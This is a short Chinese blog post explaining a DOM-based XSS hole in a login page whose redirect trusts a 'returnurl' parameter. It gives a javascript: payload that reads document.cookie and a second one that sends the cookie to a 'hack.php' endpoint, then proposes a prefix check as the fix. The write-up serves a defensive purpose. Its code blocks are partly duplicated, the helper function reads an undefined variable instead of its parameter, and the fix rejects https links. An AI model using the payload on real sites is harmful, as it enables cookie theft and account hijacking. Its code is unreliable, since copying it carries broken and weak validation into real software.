www.xxx.com网站有个登录页面login.htm,登录之后需要跳到之前的页面www.yyy.com
url形式如下:http://www.xxx.com/login.htm?returnurl=http://www.yyy.com
long.htm代码里面通过javascript跳转:
/**
* javascript获取URL指定参数对应的值
* @method getQueryString
* @param {string} s 参数名
* @return {string}
*/
function getQueryString(s){
var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if (r != null) return r[2]; return "";
}
location.href=getQueryString("returnurl");
* javascript获取URL指定参数对应的值
* @method getQueryString
* @param {string} s 参数名
* @return {string}
*/
function getQueryString(s){
var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if (r != null) return r[2]; return "";
}
location.href=getQueryString("returnurl");
这看上去没问题,满足业务需求,但是有个js漏洞 (感谢csy同学指出)
如果url变成:
http://www.xxx.com/login.htm?returnurl=javascript:alert(document.cookie);
登录完之后就能取得整个本地cookie。
更进一步,url变成:
http://www.xxx.com/login.htm?returnurl=
javascript:var%20img%20=%20document.createElement%28%27img%27%29;img.src=%27hack.php?cookie=%27+document.cookie;document.body.appendChild%28img%29;
如果恶意用户散布这个链接,只要一点击,就可以偷取用户的cookie,从而模拟用户登录大多数网站,达到盗取账号的目的。
所以这个漏洞很有必要堵上,处理一下参数里面的值,比如以判断参数值是否以http:开头(我们采用的),总之根据你的业务需要的方式做具体防范。
var returnurl = getQueryString("returnurl");
returnurl = returnurl.toLowerCase().indexOf('http:') == 0 ? returnurl : "";
location.href=returnurl;
returnurl = returnurl.toLowerCase().indexOf('http:') == 0 ? returnurl : "";
location.href=returnurl;